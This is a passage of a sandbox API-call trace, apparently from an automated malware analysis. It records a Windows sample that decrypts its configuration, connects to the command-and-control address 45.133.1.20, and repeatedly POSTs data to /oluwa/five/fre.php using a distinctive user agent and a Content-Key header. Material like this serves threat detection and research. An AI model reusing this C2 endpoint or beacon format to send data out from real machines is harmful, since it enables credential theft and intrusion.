pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0265.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.896] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0265.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.897] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0265.897] GetProcessHeap () returned 0x6a0000 [0265.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.899] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.900] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.901] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.903] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.903] GetProcessHeap () returned 0x6a0000 [0265.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0265.903] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.903] GetProcessHeap () returned 0x6a0000 [0265.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0265.904] GetProcessHeap () returned 0x6a0000 [0265.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.904] GetProcessHeap () returned 0x6a0000 [0265.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0265.905] GetProcessHeap () returned 0x6a0000 [0265.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0265.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.906] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.913] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0265.924] GetProcessHeap () returned 0x6a0000 [0265.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0265.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.928] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0265.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.929] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.930] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.930] GetProcessHeap () returned 0x6a0000 [0265.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0265.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.932] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0265.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.933] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0265.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.934] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0265.934] GetProcessHeap () returned 0x6a0000 [0265.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.935] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0265.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0265.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.937] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0265.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.938] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0265.938] GetProcessHeap () returned 0x6a0000 [0265.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0265.938] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0265.938] GetProcessHeap () returned 0x6a0000 [0265.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0265.938] socket (af=2, type=1, protocol=6) returned 0x938 [0265.939] connect (s=0x938, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0265.967] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0265.967] GetProcessHeap () returned 0x6a0000 [0265.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0265.967] GetProcessHeap () returned 0x6a0000 [0265.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0265.968] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.969] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.971] GetProcessHeap () returned 0x6a0000 [0265.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0265.971] GetProcessHeap () returned 0x6a0000 [0265.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.971] GetProcessHeap () returned 0x6a0000 [0265.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0265.971] GetProcessHeap () returned 0x6a0000 [0265.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0265.972] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.973] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.973] GetProcessHeap () returned 0x6a0000 [0265.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0265.973] GetProcessHeap () returned 0x6a0000 [0265.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.973] send (s=0x938, buf=0x6bd460*, len=242, flags=0) returned 242 [0265.974] send (s=0x938, buf=0x6bb998*, len=159, flags=0) returned 159 [0265.974] GetProcessHeap () returned 0x6a0000 [0265.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0265.974] recv (in: s=0x938, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0266.050] GetProcessHeap () returned 0x6a0000 [0266.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0266.051] GetProcessHeap () returned 0x6a0000 [0266.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0266.051] GetProcessHeap () returned 0x6a0000 [0266.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0266.052] GetProcessHeap () returned 0x6a0000 [0266.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0266.053] closesocket (s=0x938) returned 0 [0266.053] GetProcessHeap () returned 0x6a0000 [0266.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0266.053] GetProcessHeap () returned 0x6a0000 [0266.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.054] GetProcessHeap () returned 0x6a0000 [0266.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0266.054] GetProcessHeap () returned 0x6a0000 [0266.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0266.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16b4) returned 0x938 [0266.056] Sleep (dwMilliseconds=0xea60) [0266.059] GetProcessHeap () returned 0x6a0000 [0266.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0266.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.067] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0266.077] GetProcessHeap () returned 0x6a0000 [0266.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c4bc0 [0266.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.078] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c4bc0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0266.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.083] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.084] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.084] GetProcessHeap () returned 0x6a0000 [0266.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4bc0 | out: hHeap=0x6a0000) returned 1 [0266.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.086] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0266.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.087] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0266.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.088] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0266.088] GetProcessHeap () returned 0x6a0000 [0266.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0266.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.095] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.096] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.097] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.098] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.098] GetProcessHeap () returned 0x6a0000 [0266.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0266.098] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.098] GetProcessHeap () returned 0x6a0000 [0266.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0266.099] GetProcessHeap () returned 0x6a0000 [0266.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.099] GetProcessHeap () returned 0x6a0000 [0266.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0266.100] GetProcessHeap () returned 0x6a0000 [0266.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0266.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.101] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0266.116] GetProcessHeap () returned 0x6a0000 [0266.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0266.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.118] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0266.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.119] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.120] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.120] GetProcessHeap () returned 0x6a0000 [0266.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0266.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.123] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0266.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.124] CryptDestroyKey (hKey=0x6ad020) returned 1 [0266.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.127] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0266.127] GetProcessHeap () returned 0x6a0000 [0266.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0266.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.128] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0266.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.129] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0266.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.130] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0266.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.130] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0266.131] GetProcessHeap () returned 0x6a0000 [0266.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0266.131] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0266.131] GetProcessHeap () returned 0x6a0000 [0266.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0266.131] socket (af=2, type=1, protocol=6) returned 0x93c [0266.131] connect (s=0x93c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0266.174] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0266.175] GetProcessHeap () returned 0x6a0000 [0266.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0266.175] GetProcessHeap () returned 0x6a0000 [0266.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0266.175] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0266.176] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.176] GetProcessHeap () returned 0x6a0000 [0266.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba2f0 [0266.176] GetProcessHeap () returned 0x6a0000 [0266.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0266.177] GetProcessHeap () returned 0x6a0000 [0266.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0266.177] GetProcessHeap () returned 0x6a0000 [0266.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0266.178] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0266.179] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.180] GetProcessHeap () returned 0x6a0000 [0266.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0266.180] GetProcessHeap () returned 0x6a0000 [0266.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0266.180] send (s=0x93c, buf=0x6bd460*, len=242, flags=0) returned 242 [0266.181] send (s=0x93c, buf=0x6bb998*, len=159, flags=0) returned 159 [0266.181] GetProcessHeap () returned 0x6a0000 [0266.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0266.181] recv (in: s=0x93c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0266.258] GetProcessHeap () returned 0x6a0000 [0266.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0266.259] GetProcessHeap () returned 0x6a0000 [0266.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0266.259] GetProcessHeap () returned 0x6a0000 [0266.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba2f0 | out: hHeap=0x6a0000) returned 1 [0266.260] GetProcessHeap () returned 0x6a0000 [0266.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0266.260] closesocket (s=0x93c) returned 0 [0266.261] GetProcessHeap () returned 0x6a0000 [0266.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0266.261] GetProcessHeap () returned 0x6a0000 [0266.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.261] GetProcessHeap () returned 0x6a0000 [0266.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0266.262] GetProcessHeap () returned 0x6a0000 [0266.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0266.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16b8) returned 0x93c [0266.264] Sleep (dwMilliseconds=0xea60) [0266.266] GetProcessHeap () returned 0x6a0000 [0266.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0266.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.275] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0266.286] GetProcessHeap () returned 0x6a0000 [0266.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0266.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.288] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0266.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.293] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.294] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.294] GetProcessHeap () returned 0x6a0000 [0266.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0266.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.296] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0266.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.297] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0266.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.307] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0266.307] GetProcessHeap () returned 0x6a0000 [0266.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0266.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.316] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.320] StrStrA 